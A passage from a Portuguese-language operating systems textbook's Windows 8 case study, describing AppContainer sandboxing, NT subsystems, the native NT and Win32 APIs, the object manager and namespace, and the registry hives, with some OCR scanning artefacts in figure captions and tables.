que passem pela verificação que, entre outras coisas, 
garante que a aplicação esteja usando apenas APIs dis- 
poniveis no MSDK. 

Quando uma aplicação moderna esta rodando, ela 
é sempre executada em uma caixa de areia (sandbox) 
chamada AppContainer. A execução do processo nes- 
sa caixa de proteção é uma técnica de segurança para 
isolar o código menos confiável de modo que ele não 
possa mexer livremente no sistema ou nos dados do 
usuário. O AppContainer do Windows trata cada apli- 
cação como um usuário distinto e usa as facilidades de 
segurança do Windows para evitar que a aplicação aces- 
se recursos aleatórios do sistema. Quando uma aplica- 
ção precisa de acesso a um recurso do sistema, existem 
APIs WinRT que se comunicam como processos agen- 
ciadores (broker), que possuem acesso a mais partes do 
sistema, como os arquivos de um usuário. 

Conforme mostra a Figura 11.5, os subsistemas NT 
são montados a partir de quatro componentes: um proces- 
so do subsistema, um conjunto de bibliotecas, ganchos no 
CreateProcess e suporte no núcleo. Um processo do sub- 
sistema é simplesmente um serviço. A única propriedade 
especial é que ele é inicializado pelo programa smss.exe 
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(gerenciador de sessões) — o programa inicial do modo 
usuário inicializado pelo NT — como resposta a uma so- 
licitação de CreateProcess no Win32 ou da API corres- 
pondente em um subsistema distinto. Embora o Win32 
seja o único subsistema restante com suporte, o Windows 
ainda mantém o modelo de subsistema, incluindo o pro- 
cesso csrss.exe do subsistema Win32. 

O conjunto de bibliotecas implementa as funções de 
alto nível do sistema operacional específicas do subsis- 
tema e contém as rotinas de stubs, que se comunicam 
entre os processos utilizando o subsistema (mostrado à 
esquerda) e o processo do subsistema em si (mostra- 
do à direita). As chamadas ao processo do subsistema 
normalmente acontecem no modo núcleo utilizando as 
facilidades da LPC (Local Procedure Call — chamada 
de procedimento local), que implementam chamadas de 
procedimento entre os processos. 

O gancho na chamada CreateProcess do Win32 de- 
tecta o subsistema necessário a cada programa por meio 
de uma consulta à imagem binária. Feito isso, ele so- 
licita ao arquivo smss.exe que execute o processo do 
subsistema (caso ele ainda não esteja em execução). O 
processo do subsistema assume, então, a responsabili- 
dade por carregar o programa. 

O núcleo do NT foi projetado de modo a oferecer di- 
versas facilidades de uso geral que podem ser utilizadas 
na escrita de subsistemas específicos do sistema operacio- 
nal. Existe também código especial que deve ser inserido 
para que a implementação de cada subsistema aconteça 
de forma correta. Como exemplos, a chamada de sistema 
nativa NtCreateProcess implementa a duplicação de pro- 
cessos como suporte à chamada fork do POSIX, e o núcleo 
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implementa um tipo particular de tabela de cadeias de ca- 
racteres para o Win32 (denominada átomos), permitindo o 
compartilhamento eficiente das cadeias de caracteres so- 
mente de leitura entre os processos. 

Os processos do subsistema são programas NT na- 
tivos que fazem uso das chamadas de sistema nativas 
do NT disponibilizadas pelo núcleo e pelos serviços 
principais, como o smss.exe e o Isass.exe (para admi- 
nistração local da segurança). As chamadas de sistema 
nativas incluem facilidades de gerenciamento de ende- 
reços virtuais, threads, descritores (handles) e exceções 
nos processos criados para executar programas escritos 
de forma a utilizar um subsistema em particular. 


11.2.1 A interface de programação nativa de 
aplicações do NT 


Como em todos os outros sistemas operacionais, o 
Windows pode executar um conjunto de chamadas de 
sistema, que são implementadas na camada executi- 
va NTOS que executa em modo núcleo. A Microsoft 
publicou poucos detalhes dessas chamadas de sistema 
nativas. Elas são usadas internamente por programas 
de baixo nível que acompanham o pacote do sistema 
operacional (a maior parte serviços e subsistemas), 
bem como drivers de dispositivos do modo núcleo. 
Apesar de não haver muitas mudanças nessas chama- 
das de sistema a cada lançamento, a Microsoft prefe- 
riu não as tornar públicas, de modo que as aplicações 
desenvolvidas para o Windows fossem baseadas no 
Win32, aumentando, dessa forma, a probabilidade de 
funcionamento em sistemas baseados tanto em MS- 
-DOS como no NT, uma vez que a API do Win32 é 
comum a ambos. 

A maioria das chamadas de sistema nativas do NT 
opera em objetos de um tipo ou outro do modo núcleo, 
incluindo arquivos, processos, threads, pipes, semáforos 
etc. A Figura 11.6 apresenta uma lista de algumas das 
categorias comuns dos objetos do modo núcleo que têm 
suporte no Windows. Mais adiante, quando discutirmos 


(cj EEJ Categorias comuns de tipos de objetos do modo núcleo. 


Capítulo 11 ESTUDO DE CASO 2: WINDOWS 8 | 601] 


o gerenciador de objetos, apresentaremos mais detalhes 
de tipos especificos de objetos. 

Algumas vezes o uso do termo objeto, referindo-se a 
estruturas de dados manipuladas pelo sistema operacio- 
nal, pode ser confundido com orientação a objetos. Os 
objetos do sistema operacional de fato apresentam ocul- 
tação de dados e abstração, mas carecem de algumas 
das mais básicas propriedades de sistemas orientados a 
objetos — como herança e polimorfismo. 

Na API nativa do NT há chamadas disponíveis para 
criar novos objetos no modo núcleo ou acessar os exis- 
tentes. Cada chamada, criando ou abrindo um objeto, 
retorna um resultado conhecido como um descritor (ou 
handle), que é específico para o processo que o criou e 
pode, depois, ser usado em operações sobre o objeto. 
De modo geral, os descritores não podem ser passados 
de forma direta para outro processo nem usados como 
referência para o mesmo objeto. Entretanto, sob algu- 
mas circunstâncias, é possível duplicar um descritor em 
uma tabela de descritores de outros processos de uma 
forma protegida, permitindo aos processos compartilhar 
o acesso a objetos — mesmo que os objetos não estejam 
acessíveis no espaço de nomes. O processo que duplica 
um descritor deve ter, ele mesmo, descritores para os 
processos de origem e destino. 

Todo objeto tem um descritor de segurança asso- 
ciado, detalhando quem pode ou não executar certos 
tipos de operações no objeto baseado no acesso solicita- 
do. Quando os descritores são duplicados entre proces- 
sos, novas restrições de acesso podem ser adicionadas, 
específicas ao descritor duplicado. Dessa forma, um 
processo pode duplicar um descritor de leitura e escrita 
e transformá-lo em uma versão de somente leitura no 
processo de destino. 

Nem todas as estruturas de dados criadas pelo siste- 
ma são objetos e nem todos os objetos são do modo nú- 
cleo. Os únicos objetos que são de fato do modo núcleo 
são aqueles que precisam ser nomeados, protegidos ou 
compartilhados de alguma forma. Eles representam, de 
maneira usual, algum tipo de abstração de programação 
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implementada no núcleo e todos são de um tipo defi- 
nido pelo sistema, contêm operações bem definidas e 
ocupam armazenamento na memória do núcleo. Ainda 
que os programas do modo usuário possam executar as 
operações (por meio das chamadas de sistema), eles não 
podem acessar os dados de modo direto. 

A Figura 11.7 mostra uma seleção de APIs nativas, 
que utilizam os descritores para manipular os objetos do 
modo núcleo, como processos, threads, portas de IPC e 
seções (usadas para descrever os objetos de memória 
que podem ser mapeados em espaços de endereçamen- 
to). A chamada NtCreateProcess retorna um descritor 
para um objeto de processo novo, representando uma 
instância em execução do programa expressa pela Sec- 
tionHandle. A chamada DebugPortHandle é usada na 
comunicação com um depurador quando é dado contro- 
le do processo após uma exceção (por exemplo, divisão 
por zero ou acesso de memória inválido). A chamada 
ExceptPortHandle é usada na comunicação com proces- 
sos de subsistemas quando ocorrem erros e estes não 
são tratados por um depurador próprio. 

A chamada NtCreateThread usa o ProcHandle por- 
que ele pode criar um thread em qualquer processo 
para o qual o processo de origem tenha um descritor 
(com direitos de acesso suficientes). De forma similar, 
NtAllocateVirtualMemory, NtMapViewOfSection, NtRe- 
adVirtualMemory e NtWriteVirtualMemory permitem 
a um processo operar não somente em seu espaço de 
endereçamento, mas alocar endereços virtuais, seções 
de mapeamento e ler ou gravar em memória virtual de 
outros processos. NtCreateFile é a chamada API nativa 
para criar novos arquivos ou abrir um existente. NtDu- 
plicateObject é a chamada API para duplicação de des- 
critores de um processo para o outro. 

Os objetos do modo núcleo não são, logicamente, es- 
pecíficos para o Windows. Os sistemas UNIX também 


dão suporte a uma série de objetos do modo núcleo, 
como arquivos, soquetes de rede, pipes, dispositivos, 
processos e facilidades de comunicação entre processos 
(IPC — InterProcess Communication), como memó- 
ria compartilhada, portas de mensagem, semáforos e 
dispositivos de E/S. No UNIX há uma série de maneiras 
de nomear e acessar objetos, como descritores de ar- 
quivos, IDs de processos, IDs de números inteiros para 
objetos de IPC do System V e i-nodes para dispositivos. 
A implementação de cada classe de objetos do UNIX é 
específica à classe. Arquivos e soquetes usam facilida- 
des diferentes das usadas nos mecanismos de IPC do 
System V, processos ou dispositivos. 

Os objetos do núcleo no Windows utilizam uma fa- 
cilidade uniforme, baseada em descritores e nomes no 
espaço de nomes do NT, para referenciar outros deles, 
com uma implementação unificada em um gerenciador 
de objetos centralizado. Os descritores são específicos 
de cada processo, mas, como já descrito, podem ser du- 
plicados para outros processos. O gerenciador de ob- 
jetos permite que eles sejam nomeados no ato de sua 
criação e, depois, acessados pelo nome para consegui- 
rem descritores para os objetos. 

O gerenciador de objetos usa Unicode (caracteres 
longos) para representar os nomes no espaço de nomes 
do NT. Ao contrário do UNIX, o NT não costuma dis- 
tinguir entre letras maiúsculas e minúsculas (ele preser- 
va os caracteres, mas não os diferencia). O espaço de 
nomes do NT é uma coleção hierárquica, estruturada em 
árvore, de diretórios, ligações simbólicas e objetos. 

O gerenciador de objetos também proporciona fa- 
cilidades unificadas para sincronização, segurança e 
gerenciamento da vida útil dos objetos. Quem decide 
se as facilidades gerais oferecidas pelo gerenciador de 
objetos são disponibilizadas para os usuários de um ob- 
jeto em particular são os componentes do executivo, já 
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do processo. 





NtCreateProcess(&ProcHandle, Access, SectionHandle, DebugPortHandle, ExceptPortHandle, ...) 





NtCreateThread(&ThreadHandle, ProcHandle, Acesso, ThreadContext, CreateSuspended, ...) 





NtAllocateVirtualMemory(ProcHandle, Endereço, Size, Type, Proteção, ...) 





NtMapViewOfSection(SectHandle, ProcHandle, Addr, Tamanho, Proteção, ...) 





NtReadVirtualMemory(ProcHandle, Endereço, Tamanho, ...) 


NtWriteVirtualMemory(ProcHandle, Endereço, Tamanho, ...) 





NtCreateFile(&FileHandle, FileNameDescriptor, Acesso, ...) 








NtDuplicateObject(srcProcHandle, srcObjHandle, dstProcHandle, dstObjHandle, ...) 








que eles fornecem as APIs nativas que manipulam cada 
tipo de objeto. 

Não são apenas as aplicações que usam objetos ge- 
renciados pelo gerenciador de objetos. O próprio siste- 
ma operacional também pode criar e usar objetos — e 
o faz de forma intensa. A maior parte desses objetos é 
criada com o objetivo de permitir que um componente 
do sistema armazene alguma informação por um perío- 
do substancial de tempo ou para passar alguma estrutura 
de dados a outro componente e ainda se beneficiar da 
nomeação e suporte de vida útil do gerenciador de obje- 
tos. Por exemplo, quando um dispositivo é descoberto, 
um ou mais objetos de dispositivos são criados para 
representá-lo e descrever de forma lógica como ele se 
conecta com o resto do sistema. Para controlar o dispo- 
sitivo, um driver de dispositivo é carregado e um objeto 
de driver é criado contendo suas propriedades e pro- 
vendo os ponteiros para as funções que ele implementa 
para processar as solicitações de E/S. Dentro do sistema 
operacional, a referência ao driver é feita usando seu 
objeto. O driver também pode ser acessado de forma 
direta pelo nome em vez de o ser de forma indireta pelos 
dispositivos que ele controla (por exemplo, na configu- 
ração de parâmetros responsáveis por sua operação a 
partir do modo usuário). 

Diferentemente do UNIX, que coloca a raiz de seu 
espaço de nomes no sistema de arquivos, a raiz do es- 
paço de nomes do NT é mantida na memória virtual do 
núcleo. Isso significa que o NT deve recriar seu espaço 
de nomes de alto nível toda vez que o sistema é iniciali- 
zado. A utilização da memória virtual do núcleo permite 
ao NT armazenar informação no espaço de nomes sem 
antes ter de inicializar o sistema de arquivos em execu- 
ção e torna muito mais fácil para o NT adicionar novos 
tipos de objetos de modo núcleo ao sistema porque os 
próprios formatos do sistema de arquivos não precisam 
ser modificados para cada novo tipo de objeto. 

Um objeto nomeado pode ser marcado como per- 
manente, significando que ele continua existindo até 
que seja apagado de forma explícita ou que o sistema 
reinicialize, mesmo que nenhum processo tenha um 
descritor para ele. Esses objetos podem até estender o 
espaço de nomes do NT, oferecendo rotinas de análi- 
se (parse) que permitam aos objetos funcionar de for- 
ma semelhante aos pontos de montagem do UNIX. Os 
sistemas de arquivos e o registro usam essa facilidade 
para montar volumes e colmeias no espaço de nomes 
do NT. Acessar o objeto de dispositivo por um volume 
dá acesso ao volume bruto, mas o objeto de dispositivo 
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também representa uma montagem implícita do volu- 
me no espaço de nomes do NT. Os arquivos individuais 
em um volume podem ser acessados concatenando-se 
seus nomes relativos ao volume no final do nome do 
objeto de dispositivo daquele volume. 

Nomes permanentes também são usados para repre- 
sentar objetos de sincronização e memória compartilha- 
da, para que eles possam ser divididos entre os processos 
sem serem continuamente recriados à medida que os 
processos terminam e inicializam. Objetos de dispositi- 
vos e, muitas vezes, objetos de drivers, recebem nomes 
permanentes, o que lhes dá algumas das propriedades 
de persistência dos i-nodes especiais contidos no diretó- 
rio /dev do UNIX. 

Na próxima seção, descreveremos muitas outras ca- 
racterísticas da API nativa do NT e falaremos das APIs 
do Win32 que proveem invólucros (wrappers) para as 
chamadas de sistema do NT. 


11.2.2 A interface de programação de aplicações 
do Win32 


As chamadas de funções do Win32 são, de forma 
coletiva, denominadas API do Win32. Essas interfaces 
são divulgadas, amplamente documentadas e imple- 
mentadas como rotinas de bibliotecas que ou envolvem 
uma chamada de sistema nativa do NT usada na exe- 
cução de algum trabalho ou, em alguns casos, realizam 
o trabalho de forma correta no modo usuário. Embora 
as APIs nativas do NT não sejam publicadas, muitas 
das funcionalidades que elas apresentam são acessíveis 
pela API do Win32. As chamadas da API do Win32 
existentes quase nunca mudam com os lançamentos do 
Windows, embora muitas funções novas sejam adicio- 
nadas à API. 

A Figura 11.8 apresenta várias chamadas API do 
Win32 de baixo nível e as chamadas API nativas do NT 
que elas envolvem. O interessante na tabela é como o 
mapeamento é desinteressante. A maior parte das fun- 
ções do Win32 de baixo nível tem equivalentes nativas 
do NT, o que não surpreende, uma vez que o Win32 foi 
projetado pensando-se no NT. Em vários casos, a cama- 
da do Win32 deve manipular os parâmetros do Win32 
para mapea-los no NT. Por exemplo, transformar no- 
mes de caminhos em sua forma canônica e mapeá-los 
nos nomes de caminhos do NT apropriados, inclusive 
nomes de dispositivos especiais do MS-DOS (como 
LPT:). As APIs do Win32 destinadas à criação de pro- 
cessos e threads também devem notificar o processo 
de subsistema do Win32, csrss.exe, informando que há 
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novos processos e threads para ele supervisionar, como 
trataremos na Seção 11.4. 

Algumas chamadas do Win32 usam nomes de ca- 
minhos, ao passo que as chamadas do NT equivalentes 
usam descritores. Assim sendo, as rotinas de invólucros 
têm de abrir os arquivos, chamar o NT e, no final, fechar 
o descritor. Os invólucros também traduzem as APIs do 
Win32 de ANSI para Unicode. As funções do Win32 
apresentadas na Figura 11.8 que usam cadeias de ca- 
racteres como parâmetros são, na verdade, duas APIs 
— por exemplo, CreateProcessW e CreateProcessA. 
As cadeias de caracteres passadas para a segunda API 
devem ser traduzidas para Unicode antes de chamar a 
API do NT que lhe dá suporte, já que o NT funciona 
apenas com Unicode. 

Como as interfaces do Win32 existentes sofrem pou- 
cas alterações a cada lançamento do Windows, na teoria 
os programas binários que funcionam de maneira cor- 
reta nas versões anteriores continuarão funcionando na 
nova versão. Na prática, são frequentes os problemas 
de compatibilidade com as novas versões. O Windows 
é tão complexo que mudanças sem consequências apa- 
rentes podem causar falhas nas aplicações. Além disso, 
as próprias aplicações são as culpadas em alguns casos, 
uma vez que fazem checagens explícitas para versões 
específicas de sistemas operacionais ou se tornam viti- 
mas dos próprios erros latentes, que são expostos quan- 
do elas são executadas em novas versões. A Microsoft, 
todavia, se esforça a cada lançamento para testar uma 
ampla variedade de aplicações com o objetivo de en- 
contrar incompatibilidades e resolvê-las ou fornecer so- 
luções específicas para tratá-las. 


O Windows dá suporte a dois ambientes de execu- 
ção especiais, ambos chamados Windows no Windows 
(Windows-on-Windows — WOW). O WOW32 é 
usado em sistemas de 32 bits x86 para executar aplica- 
ções de 16 bits do Windows 3.x mapeando as chamadas 
de sistema e os parâmetros entre os ambientes de 16 e 
32 bits. De forma similar, o WOW64 permite às apli- 
cações do Windows de 32 bits serem executadas em 
sistemas x64. 

A filosofia da API do Windows é muito diferente da 
do UNIX, em que as funções do sistema operacional são 
simples, com poucos parâmetros e poucos pontos onde 
existe múltiplas maneiras de realizar uma operação. O 
Win32 fornece interfaces muito abrangentes com vários 
parâmetros, quase sempre com três ou quatro formas de 
resolver a mesma coisa, que combinam funções de bai- 
xo nível e alto nível como CreateFile e CopyFile. 

Isso quer dizer que o Win32 proporciona um con- 
junto rico de interfaces, mas também apresenta muita 
complexidade em razão da fraca divisão em camadas de 
um sistema que combina funções de alto e baixo nível 
na mesma API. Para nosso estudo de sistemas operacio- 
nais, apenas as funções de baixo nível da API do Win32 
que envolvem a API nativa do NT são relevantes, por- 
tanto iremos focá-las. 

O Win32 contém chamadas para criar e gerenciar 
processos e threads. Também há várias chamadas re- 
lacionadas com a comunicação entre processos, como 
criar, destruir e usar mutexes, semáforos, eventos, por- 
tas de comunicação e outros objetos de IPC. 

Ainda que a maior parte do sistema de gerenciamen- 
to de memória seja invisível para os programadores, 
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CreateProcess NtCreateProcess 
CreateThread NtCreateThread 
SuspendThread NtSuspendThread 
CreateSemaphore NtCreateSemaphore 
ReadFile NtReadFile 
DeleteFile NtSetlnformationFile 





CreateFileMapping 


NtCreateSection 




















VirtualAlloc NtAllocateVirtualMemory 
MapViewOfFile NtMapViewOfSection 
DuplicateHandle NtDuplicateObject 
CloseHandle NtClose 








uma característica importante é visível: a habilidade de 
um processo mapear um arquivo para uma região de sua 
memória virtual. Isso permite aos threads em execução 
em um processo a habilidade de operações de leitura 
e gravação para que possam transferir dados do disco 
para a memória. Com arquivos mapeados em memória, 
o próprio sistema de gerenciamento de memória execu- 
ta as entradas e saídas conforme a necessidade (pagina- 
ção por demanda). 

O Windows implementa arquivos mapeados em 
memória usando três facilidades completamente dife- 
rentes. Primeiro, oferece interfaces que permitem aos 
processos gerenciar seus próprios espaços de endere- 
çamento virtual, incluindo a reserva de faixas de ende- 
reços para utilização posterior. Segundo, o Win32 dá 
suporte a uma abstração chamada de mapeamento de 
arquivo, que é utilizada para representar objetos ende- 
reçáveis como arquivos (um mapeamento de arquivo é 
chamado de seção na camada do NT). De forma mais 
frequente, os mapeamentos de arquivos são criados 
para fazer referência a arquivos usando um descritor de 
arquivo, mas eles também podem ser criados para fazer 
referência a páginas privadas alocadas a partir do arqui- 
vo de páginas do sistema. A terceira facilidade mapeia 
visões dos mapeamentos de arquivos no espaço de en- 
dereçamento de um processo. O Win32 somente permi- 
te que uma visão seja criada para o processo em curso, 
mas a facilidade NT envolvida é mais geral, permitindo 
que as visões sejam criadas para qualquer processo para 
o qual se tenha um descritor com as permissões apro- 
priadas. Separar a criação de um mapeamento de arqui- 
vos da operação de mapeamento do arquivo no espaço 
de endereçamento é uma abordagem diferente da usada 
na função mmap do UNIX. 

No Windows, os mapeamentos de arquivos são ob- 
jetos do modo núcleo representados por um descritor. 
Como a maioria dos descritores, os mapeamentos de 
arquivos podem ser duplicados em outros processos, e 
cada processo pode mapeá-los em seu próprio espaço 
de endereçamento, se achar adequado. Isso é útil para 
compartilhar memória privada entre processos sem ter 
de criar arquivos para o compartilhamento. Na camada 
do NT, os mapeamentos de arquivos (seções) também 
podem se tornar persistentes no espaço de nomes do NT 
e serem acessados pelo nome. 

Uma área importante para muitos programas é a E/S 
de arquivos. Em uma visão básica do Win32, os arqui- 
vos são apenas sequências de bytes. O Win32 oferece 
mais de 60 chamadas para criar e destruir arquivos e 
diretórios, abrir e fechar arquivos, ler e escrever neles, 
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solicitar e configurar atributos dos arquivos, travar ex- 
tensões de bytes e muitas outras operações fundamen- 
tais, tanto para organização do sistema de arquivos 
como para o seu acesso individual. 

Também há recursos avançados para o gerenciamen- 
to de dados nos arquivos. Além do fluxo primário de 
dados, os arquivos armazenados no sistema de arquivos 
NTFS podem ter fluxos de dados adicionais. Os arqui- 
vos (e até volumes inteiros) podem ser criptografados 
e compactados e/ou representados como fluxos espar- 
sos de bytes em que as regiões faltantes no meio não 
ocupam espaço no disco. Os volumes do sistema de 
arquivos podem ser organizados entre múltiplas parti- 
ções separadas de disco usando vários níveis de arma- 
zenamento RAID. As modificações aos arquivos ou às 
subárvores de diretórios podem ser detectadas por um 
mecanismo de notificação ou pela leitura do diário que 
o NTFS mantém para cada volume. 

Cada volume do sistema de arquivos é montado no 
espaço de nomes do NT de forma implícita, de acordo 
com o nome dado ao volume; assim sendo, um arquivo 
\foo\bar deve ser nomeado como, por exemplo, \Devi- 
ce\HarddiskVolume\foo\bar. Em cada volume NTFS, 
pontos de montagem (chamados pontos de reanálise no 
Windows) e ligações simbólicas têm suporte para aju- 
dar na organização de volumes individuais. 

O modelo de E/S de baixo nívelno Windows é funda- 
mentalmente assíncrono. Uma vez que uma operação de 
E/S é inicializada, a chamada de sistema pode retornar e 
permitir que o thread que inicializou a E/S continue em 
paralelo com sua operação. O Windows dá suporte ao 
cancelamento, bem como a diferentes mecanismos para 
que os threads sejam sincronizados com as operações 
de E/S quando são concluídos; também permite aos 
programas especificar qual E/S deve estar sincronizada 
quando um arquivo é aberto; e muitas funções de biblio- 
tecas, como as da biblioteca C e chamadas do Win32, 
especificam uma E/S sincronizada para compatibilidade 
ou para simplificar o modelo de programação. Nesses 
casos, o executivo será sincronizado de forma clara com 
o término da E/S antes de retornar para o modo usuário. 

Outra área para a qual o Win32 fornece chamadas é 
a de segurança. Cada thread é associado com um objeto 
do modo núcleo, chamado de token, que apresenta in- 
formações sobre a identidade e os privilégios associados 
ao thread. Cada objeto pode ter uma ACL (Access Con- 
trol List — Lista de controle de acessos) detalhando de 
maneira precisa quais usuários podem acessá-lo e quais 
operações podem executar nele. Essa abordagem provê 
uma segurança refinada na qual acessos específicos a 
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todos os objetos podem ser garantidos ou negados aos 
usuários. O modelo de segurança é extensível, permitin- 
do que as aplicações incluam novas regras de segurança, 
como limitar as horas em que o acesso é permitido. 

O espaço de nomes do Win32 é diferente do espaço 
de nomes nativo do NT descrito na seção anterior. Ape- 
nas partes do espaço de nomes do NT são visíveis para 
as APIs do Win32 (entretanto, o espaço de nomes do NT 
inteiro pode ser acessado por um hack no Win32 que 
usa prefixos com caracteres especiais, como “AN. No 
Win32, os arquivos são acessados com relação a letras 
de unidades. O diretório do NT WosDevices contém 
um conjunto de ligações simbólicas das letras de uni- 
dades com os objetos de dispositivos reais. Por exem- 
plo, \DosDevices\C: pode ser uma ligação para Device 
HarddiskVolumel. Esse diretório também contém liga- 
ções para outros dispositivos do Win32, como COMT:, 
LPTI: e NUL: (para as portas serial e de impressão e 
o tão importante dispositivo nulo). \DosDevices é, na 
verdade, uma ligação simbólica para \??, que foi esco- 
lhido por questão de eficiência. Outro diretório do NT, o 
\BaseNamedObjects, é usado para armazenar objetos di- 
versos do modo núcleo, acessíveis pela API do Win32. 
Estes incluem objetos de sincronização como os semá- 
foros, memória compartilhada, temporizadores, portas 
de comunicação e nomes de dispositivos. 

Além das interfaces de sistema de baixo nível que 
descrevemos, a API do Win32 também dá suporte a 
muitas outras funções para operações de GUI, incluin- 
do todas as chamadas para gerenciamento da interface 
gráfica do sistema. Elas são chamadas para criação, des- 
truição, gerenciamento e utilização de janelas, menus, 
barras de ferramentas, barras de estado e de rolamento, 
caixas de diálogo, ícones e muitos outros itens que apa- 
recem na tela. Há chamadas para desenhar figuras ge- 
ométricas, preenchê-las, gerenciar paletas de cores que 
elas usam, tratar as fontes e mostrar ícones na tela. Por 
último, há chamadas para lidar com o teclado, mouse 
e outros dispositivos de entrada humana, assim como 
áudio, impressão e outros dispositivos de saída. 

As operações da GUI trabalham de forma direta com 
o driver win32k.sys usando interfaces especiais para 
acessar essas funções no modo núcleo a partir de biblio- 
tecas do modo usuário. Como essas chamadas não en- 
volvem as chamadas de sistema do núcleo no executivo 
do NTOS, não falaremos mais delas. 


11.2.3 O registro do Windows 


A raiz do espaço de nomes do NT é mantida no nú- 
cleo. O armazenamento, como os volumes do sistema 
de arquivos, é anexado ao espaço de nomes do NT. Uma 


vez que o espaço de nomes do NT é criado novamente 
toda vez que o sistema inicializa, como o sistema sabe 
sobre qualquer detalhe específico de sua configuração? 
A resposta é que o Windows anexa um tipo especial de 
sistema de arquivos (otimizado para arquivos peque- 
nos) no espaço de nomes do NT. Esse sistema de arqui- 
vos é chamado de registro e é organizado em volumes 
separados, chamados colmeias (hives). Cada colmeia 
é mantida em um arquivo separado (no diretório C:\ 
Windows\system32\config\ do volume de inicialização). 
Quando um sistema Windows é inicializado, uma col- 
meia em particular, chamada SYSTEM, é carregada para 
a memória pelo mesmo programa de inicialização que 
carrega o núcleo e outros arquivos, como drivers, do 
volume de inicialização. 

O Windows mantém uma grande quantidade de in- 
formação crucial na colmeia SYSTEM, incluindo infor- 
mação sobre quais drivers utilizar em quais dispositivos, 
qual software executar primeiro, além de muitos parâme- 
tros que governam a operação do sistema. Essa informa- 
ção é usada até pelo próprio programa de inicialização 
para determinar quais drivers são de inicialização, ne- 
cessários imediatamente após a inicialização. Eles in- 
cluem os drivers que entendem o sistema de arquivos 
e drivers de disco para o volume que contém o próprio 
sistema operacional. 

Outras colmeias de configuração são usadas depois 
que o sistema é inicializado para descrever informações 
sobre os softwares instalados no sistema, usuários es- 
pecíficos, e as classes dos objetos COM (Component 
Object-model — Modelos de objetos componentes), do 
modo usuário, instaladas no sistema. As informações de 
autenticação para usuários locais são mantidas na col- 
meia SAM (Security Access Manager — Gerenciador 
de acessos de segurança), ao passo que as informações 
para usuários de rede são mantidas pelo serviço /sass 
na colmeia security, e coordenadas com os servidores 
de diretório de rede, de forma que os usuários tenham o 
nome e a senha de suas contas comuns em toda a rede. 
Uma lista das colmeias usadas no Windows é apresen- 
tada na Figura 11.9. 

Antes da introdução do registro, as informações 
de configuração no Windows eram mantidas em cen- 
tenas de arquivos .ini (inicialização) espalhados pelo 
disco. O registro reúne esses arquivos em um armaze- 
namento central, que fica disponível previamente no 
processo de inicialização do sistema. Isso é importante 
para a implementação das funcionalidades plug-and- 
-play do Windows. O registro, entretanto, tornou-se 


muito desorganizado conforme o Windows evoluia. 
Há convenções fracamente definidas sobre como as 
informações de configuração deveriam ser organiza- 
das, e muitas aplicações utilizam-se de improvisos. A 
maior parte dos usuários, aplicações e todos os drivers 
funcionam com todos os privilégios e frequentemente 
modificam parâmetros do sistema diretamente no re- 
gistro — algumas vezes interferindo uns com os outros 
e desestabilizando o sistema. 

O registro é um cruzamento estranho entre um sis- 
tema de arquivos e uma base de dados e ainda assim 
é diferente de ambos. Livros inteiros foram escritos 
descrevendo o registro (BORN, 1998; HIPSON, 2002; 
IVENS, 1998), e muitas empresas surgiram para vender 
softwares especiais apenas para gerenciar a complexi- 
dade do registro. 

Para explorar o registro, o Windows tem um progra- 
ma com uma interface gráfica, chamado regedit, que 
permite que se abram e explorem os diretórios (chama- 
dos chaves) e itens de dados (chamados de valores). A 
linguagem de scripts da Microsoft, PowerShell, tam- 
bém pode ser útil para percorrer as chaves e os valores 
do registro como se fossem diretórios e arquivos. Uma 
ferramenta mais interessante é a procmon, que é dispo- 
nibilizada no site de ferramentas da Microsoft: <www. 
microsoft.com/technet/sysinternals>. 

A procmon observa todos os acessos ao registro que 
acontecem no sistema e é muito esclarecedora. Alguns 
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programas acessam a mesma chave dezenas de milhares 
de vezes, repetidamente. 

Como o nome indica, o regedit permite aos usuá- 
rios editar o registro — mas tenha muito cuidado se 
um dia fizer isso. É muito fácil fazer com que o sis- 
tema fique incapaz de inicializar ou danificar a ins- 
talação de aplicações de forma que você não consiga 
consertar sem bastante mágica. A Microsoft prome- 
teu limpar o registro em lançamentos futuros, mas 
por enquanto ele é uma enorme confusão — muito 
mais complicado que as informações de configuração 
mantidas no UNIX. A complexidade e a fragilidade do 
registro levaram os projetistas de novos sistemas ope- 
racionais — em particular, iOS e Android — a evitar 
algo semelhante a ele. 

O registro é acessível ao programador de Win32. Há 
chamadas para criar e apagar chaves, procurar valores 
nelas e mais. Algumas das mais úteis estão listadas na 
Figura 11.10. 

Quando o sistema é desligado, a maioria das infor- 
mações do registro é armazenada em disco nas col- 
meias. Como a integridade dessas informações é tão 
crítica ao funcionamento correto do sistema, backups 
são feitos de forma automática e as gravações de me- 
tadados são levadas para o disco para impedir a cor- 
rupção na eventualidade de um travamento do sistema. 
A perda do registro implica a reinstalação de todos os 
softwares no sistema. 


(FIGURA 11.9) As colmeias do registro no Windows. HKLM é uma abreviação para HKEY_LOCAL_MACHINE. 






































Arquivo colmeia Nome montado Utilização 

SYSTEM HKLM\SYSTEM Informações de configuração do sistema operacional, 
usadas pelo núcleo 

HARDWARE HKLM\HARDWARE Colmeia em memória, que grava hardwares detectados 

BCD HKLM\BCD* Base de dados de configurações de inicialização 

SAM HKLM\SAM Informações de contas de usuarios locais 

SECURITY HKLM\SECURITY Informações de contas do Isass e outras informações de 
segurança 

DEFAULT HKEY_USERS\.DEFAULT Colmeia-padrão para novos usuários 

NTUSER.DAT HKEY USERS Ixuser id> Colmeia específica de usuários, mantida no diretório 
pessoal 

SOFTWARE HKLM\SOFTWARE Classes de aplicações registradas pelo COM 

COMPONENTS HKLM\COMPONENTS Manifestos e dependéncias para os componentes do 
sistema 
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[FIGURA 11.10] Algumas das chamadas API do Win32 para utilização do registro. 























Função API do Win32 Descrição 
RegCreateKey Ex Cria uma nova chave no registro 
RegDeleteKey Apaga uma chave do registro 
RegOpenkKeyEx Abre uma chave para obter um descritor para ela 
RegEnumKeyEx Enumera as subchaves subordinadas a chave do descritor 
RegQueryValueEx Procura por um valor nos dados da chave 








11.3 Estrutura do sistema 


Nas seções anteriores, examinamos o Windows 
como é visto por um programador escrevendo códigos 
para o modo usuário. Agora olharemos por baixo da 
tampa, para ver como o sistema é organizado inter- 
namente, o que os vários componentes fazem e como 
interagem uns com os outros e com os programas de 
usuário. Essa é a parte do sistema vista pelos progra- 
madores que implementam códigos de baixo nível do 
modo usuário, como subsistemas e serviços nativos, 
bem como a visão do sistema dada aos desenvolvedo- 
res de drivers de dispositivos. 

Ainda que haja muitos livros sobre como usar o Win- 
dows, há muito pouco sobre como ele funciona inter- 
namente. Um dos melhores lugares para procurar mais 
informações sobre esse assunto é o Microsoft Windows 
